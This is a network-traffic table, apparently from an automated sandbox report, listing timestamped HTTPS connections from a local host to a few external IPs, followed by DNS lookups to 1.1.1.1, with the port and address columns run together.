                                                          Dec 3, 2024 03:28:00.253731012 CET4434981713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.257491112 CET49821443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.257514000 CET4434982113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.257582903 CET49821443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.257698059 CET49821443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.257714033 CET4434982113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.295593023 CET4434981613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.340171099 CET49816443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.342003107 CET49816443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.342009068 CET4434981613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.342391014 CET49816443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.342396021 CET4434981613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.395909071 CET4434982034.117.59.81192.168.2.4
                                                          Dec 3, 2024 03:28:00.395970106 CET4434982034.117.59.81192.168.2.4
                                                          Dec 3, 2024 03:28:00.396023989 CET49820443192.168.2.434.117.59.81
                                                          Dec 3, 2024 03:28:00.521692038 CET49820443192.168.2.434.117.59.81
                                                          Dec 3, 2024 03:28:00.521707058 CET4434982034.117.59.81192.168.2.4
                                                          Dec 3, 2024 03:28:00.530891895 CET49794443192.168.2.4172.217.21.36
                                                          Dec 3, 2024 03:28:00.530903101 CET44349794172.217.21.36192.168.2.4
                                                          Dec 3, 2024 03:28:00.531407118 CET49822443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:00.531460047 CET44349822149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:00.531514883 CET49822443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:00.531944990 CET49822443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:00.531955957 CET44349822149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:00.536504984 CET49823443192.168.2.434.117.59.81
                                                          Dec 3, 2024 03:28:00.536529064 CET4434982334.117.59.81192.168.2.4
                                                          Dec 3, 2024 03:28:00.536587000 CET49823443192.168.2.434.117.59.81
                                                          Dec 3, 2024 03:28:00.536829948 CET49823443192.168.2.434.117.59.81
                                                          Dec 3, 2024 03:28:00.536842108 CET4434982334.117.59.81192.168.2.4
                                                          Dec 3, 2024 03:28:00.618504047 CET4434981913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.618571043 CET4434981913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.618618011 CET49819443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.618848085 CET49819443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.618860960 CET4434981913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.618870974 CET49819443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.618875980 CET4434981913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.622652054 CET49824443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.622669935 CET4434982413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.622725964 CET49824443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.622982025 CET49824443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.622996092 CET4434982413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.663641930 CET4434981813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.663705111 CET4434981813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.663757086 CET49818443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.663844109 CET49818443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.663862944 CET4434981813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.663877964 CET49818443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.663882971 CET4434981813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.666935921 CET49825443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.666949034 CET4434982513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.667006016 CET49825443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.667232990 CET49825443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.667244911 CET4434982513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.697422028 CET4434981713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.697475910 CET4434981713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.697509050 CET49817443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.697825909 CET49817443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.697829962 CET4434981713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.697839022 CET49817443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.697841883 CET4434981713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.700844049 CET49826443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.700855017 CET4434982613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.700901985 CET49826443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.701302052 CET49826443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.701313019 CET4434982613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.748960018 CET4434981613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.749005079 CET4434981613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.749053955 CET49816443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.749205112 CET49816443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.749214888 CET4434981613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.749223948 CET49816443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.749228001 CET4434981613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.751214981 CET49827443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.751224041 CET4434982713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:00.751292944 CET49827443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.751434088 CET49827443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:00.751441956 CET4434982713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:01.754151106 CET4434982334.117.59.81192.168.2.4
                                                          Dec 3, 2024 03:28:01.754748106 CET49823443192.168.2.434.117.59.81
                                                          Dec 3, 2024 03:28:01.754764080 CET4434982334.117.59.81192.168.2.4
                                                          Dec 3, 2024 03:28:01.755079985 CET4434982334.117.59.81192.168.2.4
                                                          Dec 3, 2024 03:28:01.755383015 CET49823443192.168.2.434.117.59.81
                                                          Dec 3, 2024 03:28:01.755436897 CET4434982334.117.59.81192.168.2.4
                                                          Dec 3, 2024 03:28:01.755507946 CET49823443192.168.2.434.117.59.81
                                                          Dec 3, 2024 03:28:01.799335957 CET4434982334.117.59.81192.168.2.4
                                                          Dec 3, 2024 03:28:02.115354061 CET4434982113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.115833998 CET49821443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.115848064 CET4434982113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.115942001 CET44349822149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:02.116182089 CET49822443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:02.116198063 CET44349822149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:02.116317034 CET49821443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.116321087 CET4434982113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.116559982 CET44349822149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:02.116947889 CET49822443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:02.117002964 CET44349822149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:02.117091894 CET49822443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:02.117105961 CET49822443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:02.117113113 CET44349822149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:02.217505932 CET4434982334.117.59.81192.168.2.4
                                                          Dec 3, 2024 03:28:02.217559099 CET4434982334.117.59.81192.168.2.4
                                                          Dec 3, 2024 03:28:02.217612982 CET49823443192.168.2.434.117.59.81
                                                          Dec 3, 2024 03:28:02.218547106 CET49823443192.168.2.434.117.59.81
                                                          Dec 3, 2024 03:28:02.218559027 CET4434982334.117.59.81192.168.2.4
                                                          Dec 3, 2024 03:28:02.381320953 CET4434982513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.381802082 CET49825443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.381819010 CET4434982513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.382237911 CET49825443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.382247925 CET4434982513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.401494980 CET4434982413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.401777983 CET49824443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.401802063 CET4434982413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.402084112 CET49824443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.402087927 CET4434982413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.570692062 CET4434982113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.570744991 CET4434982113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.570818901 CET49821443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.571036100 CET49821443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.571047068 CET4434982113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.571057081 CET49821443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.571063042 CET4434982113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.574047089 CET49828443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.574085951 CET4434982813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.574170113 CET49828443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.574333906 CET49828443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.574346066 CET4434982813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.638681889 CET4434982713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.639080048 CET49827443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.639098883 CET4434982713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.639647007 CET49827443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.639651060 CET4434982713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.657804012 CET4434982613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.658132076 CET49826443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.658148050 CET4434982613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.658668995 CET49826443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.658673048 CET4434982613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.720597029 CET44349822149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:02.722976923 CET44349822149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:02.723035097 CET49822443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:02.723232031 CET49822443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:02.723246098 CET44349822149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:02.726547956 CET49829443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:02.726572990 CET44349829149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:02.726650000 CET49829443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:02.726876020 CET49829443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:02.726887941 CET44349829149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:02.816647053 CET4434982513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.816720009 CET4434982513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.816905022 CET49825443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.818182945 CET49825443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.818182945 CET49825443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.818193913 CET4434982513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.818202019 CET4434982513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.819457054 CET49830443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.819483042 CET4434983013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.819542885 CET49830443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.819667101 CET49830443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.819678068 CET4434983013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.845657110 CET4434982413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.845714092 CET4434982413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.845762014 CET49824443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.845863104 CET49824443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.845874071 CET4434982413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.845882893 CET49824443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.845886946 CET4434982413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.848156929 CET49831443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.848182917 CET4434983113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:02.848264933 CET49831443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.848393917 CET49831443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:02.848412037 CET4434983113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:03.083030939 CET4434982713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:03.083076000 CET4434982713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:03.083125114 CET49827443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:03.083369970 CET49827443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:03.083369970 CET49827443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:03.083379984 CET4434982713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:03.083388090 CET4434982713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:03.085630894 CET49832443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:03.085664988 CET4434983213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:03.085741997 CET49832443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:03.085875988 CET49832443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:03.085890055 CET4434983213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:03.111685038 CET4434982613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:03.111737967 CET4434982613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:03.111927986 CET49826443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:03.114063025 CET49833443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:03.114067078 CET49826443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:03.114067078 CET49826443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:03.114073038 CET4434982613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:03.114078999 CET4434982613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:03.114092112 CET4434983313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:03.114177942 CET49833443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:03.114317894 CET49833443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:03.114331007 CET4434983313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.136503935 CET44349829149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:04.136902094 CET49829443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:04.136919022 CET44349829149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:04.137250900 CET44349829149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:04.137576103 CET49829443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:04.137655020 CET44349829149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:04.137713909 CET49829443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:04.179335117 CET44349829149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:04.353492975 CET4434982813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.355793953 CET49828443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.355823040 CET4434982813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.356250048 CET49828443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.356256008 CET4434982813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.659595013 CET4434983113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.660128117 CET49831443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.660146952 CET4434983113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.660574913 CET49831443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.660582066 CET4434983113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.691982985 CET4434983013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.693834066 CET44349829149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:04.693898916 CET44349829149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:04.694140911 CET49830443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.694154024 CET4434983013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.694164038 CET49829443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:04.694502115 CET49830443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.694505930 CET4434983013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.695449114 CET49829443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:28:04.695457935 CET44349829149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:28:04.797559977 CET4434982813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.797605991 CET4434982813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.797811985 CET49828443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.797837019 CET49828443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.797849894 CET4434982813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.797858953 CET49828443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.797864914 CET4434982813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.800611973 CET49834443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.800647020 CET4434983413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.800730944 CET49834443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.800878048 CET49834443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.800890923 CET4434983413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.857999086 CET4434983213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.858334064 CET49832443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.858354092 CET4434983213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.858728886 CET49832443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.858733892 CET4434983213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.910233974 CET4434983313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.910552979 CET49833443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.910573959 CET4434983313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:04.910927057 CET49833443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:04.910936117 CET4434983313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.107403040 CET4434983113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.107484102 CET4434983113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.107755899 CET49831443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.107755899 CET49831443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.107755899 CET49831443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.110085964 CET49835443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.110119104 CET4434983513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.110310078 CET49835443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.110310078 CET49835443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.110338926 CET4434983513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.147124052 CET4434983013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.147176981 CET4434983013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.147305965 CET49830443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.147501945 CET49830443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.147501945 CET49830443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.147521019 CET4434983013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.147531033 CET4434983013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.149646044 CET49836443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.149681091 CET4434983613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.149768114 CET49836443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.149893999 CET49836443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.149905920 CET4434983613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.295090914 CET4434983213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.295150042 CET4434983213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.295198917 CET49832443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.295308113 CET49832443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.295325994 CET4434983213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.295339108 CET49832443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.295344114 CET4434983213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.297610044 CET49837443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.297632933 CET4434983713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.297704935 CET49837443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.297899961 CET49837443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.297909021 CET4434983713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.354145050 CET4434983313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.354196072 CET4434983313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.354243040 CET49833443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.354403019 CET49833443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.354414940 CET4434983313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.354428053 CET49833443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.354433060 CET4434983313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.357215881 CET49838443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.357244968 CET4434983813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.357352972 CET49838443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.357566118 CET49838443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.357578039 CET4434983813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:28:05.418260098 CET49831443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:28:05.418276072 CET4434983113.107.246.63192.168.2.4
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 3, 2024 03:26:44.364140987 CET53561841.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:26:44.403794050 CET53500561.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:26:47.174894094 CET53524911.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:26:48.608418941 CET5948953192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:26:48.608465910 CET6374753192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:26:48.748085022 CET53594891.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:26:48.748245955 CET53637471.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:26:50.125413895 CET6138553192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:26:50.125623941 CET5643153192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:26:50.264748096 CET53613851.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:26:50.364288092 CET53564311.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:26:53.632282019 CET6256853192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:26:53.632520914 CET5499153192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:26:53.886363029 CET53625681.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:26:53.892307043 CET53549911.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:26:53.894243956 CET6310653192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:26:53.894273996 CET6534953192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:26:54.033624887 CET53631061.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:26:54.034671068 CET53653491.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:26:57.360223055 CET5775953192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:26:57.360477924 CET5913053192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:26:57.595671892 CET53577591.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:26:57.662156105 CET53591301.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:00.806376934 CET6450953192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:00.806652069 CET5686653192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:00.807936907 CET6432653192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:00.808067083 CET5112353192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:00.947027922 CET53591071.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:00.947794914 CET53568661.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:00.947968960 CET53511231.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:00.948641062 CET53645091.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:00.949932098 CET53600451.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:02.597590923 CET138138192.168.2.4192.168.2.255
                                                          Dec 3, 2024 03:27:03.505875111 CET6018653192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:03.506259918 CET5755253192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:03.514606953 CET5935553192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:03.515117884 CET4972953192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:03.657454967 CET53593551.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:03.657820940 CET53497291.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:03.855097055 CET5359853192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:03.856702089 CET6305253192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:03.983711958 CET53576101.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:04.000149965 CET53556211.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:04.247086048 CET53611801.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:04.414361954 CET53630521.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:04.416078091 CET53535981.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:04.528251886 CET6013753192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:04.528465986 CET5705753192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:05.770960093 CET53575521.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:05.770972013 CET53570571.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:05.771507978 CET53601371.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:05.774947882 CET53601861.1.1.1192.168.2.4
